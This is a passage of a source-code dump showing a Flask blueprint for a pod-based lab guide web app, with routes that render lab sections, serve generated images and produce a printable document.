soup = BeautifulSoup(contents, features="html.parser")
for tag in soup.find_all("code"):
htmlstring += tag.get_text()
htmlstring += "</pre>"
return htmlstring
```
#### File: HOLCLD-2100/lab/lab_routes.py
```python
import os, sys, uuid
sys.path.append(os.path.dirname(os.path.abspath(__file__)))
from flask import Blueprint, render_template, send_file, render_template_string
from core.routefunc import podlist, ordered_menu_list, base_section_files, create_lab_ui_steps, unordered_menu_dictionary
from core.routefunc import ordered_section_list, get_page_position_data, create_footer_urls
from core.lab_data import get_lab_data
from core.print_doc import create_whole_doc
from lab.pod_data import get_pod_data
from core.imgman import txtimage
lab = Blueprint('lab',__name__, template_folder='templates', static_folder='static')
@lab.route('/pod<int:pod_id>/<section>/<chapter>', methods=['GET', 'POST'])
@lab.route('/pod<int:pod_id>', methods=['GET', 'POST'])
def route2section(pod_id, section="intro", chapter="landing"):
anchor = ""
section_info = unordered_menu_dictionary()
page_number = section_info[section][chapter]['pos']
return render_template(section_info[section][chapter]['file'],
pod=str(pod_id),
podlist=podlist(),
data=get_pod_data(pod_id),
lab_data=get_lab_data(),
footer_urls=create_footer_urls(),
html_for_step_status=create_lab_ui_steps(base_section_files(),section),
section=section,
chapter=chapter,
anchor=anchor,
title=section_info[section][chapter]['title'],
menu=ordered_menu_list(base_section_files()),
unordered_menu=unordered_menu_dictionary(),
ordered_section_list=ordered_section_list(base_section_files()),
page_position=get_page_position_data(page_number),
cache_kill=uuid.uuid4()
)
@lab.route('/imgman/pod/<int:pod_id>/id/<int:imgman_id>')
def img_man(imgman_id, pod_id):
# This takes the parameters of the URL and passes it to the image processor that then reads the CSV file
# and returns back the binary image that is passed to the browser IMG tag.
return send_file(txtimage(imgman_id, pod_id), mimetype='image/PNG')
@lab.route('/pod<int:pod_id>/print')
def print_doc(pod_id):
data=get_pod_data(pod_id)
return render_template_string(create_whole_doc(pod_id),
title='LTRACI-2967: ',
pod=str(pod_id),
page_position=get_page_position_data(1),
data=data)
``` |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.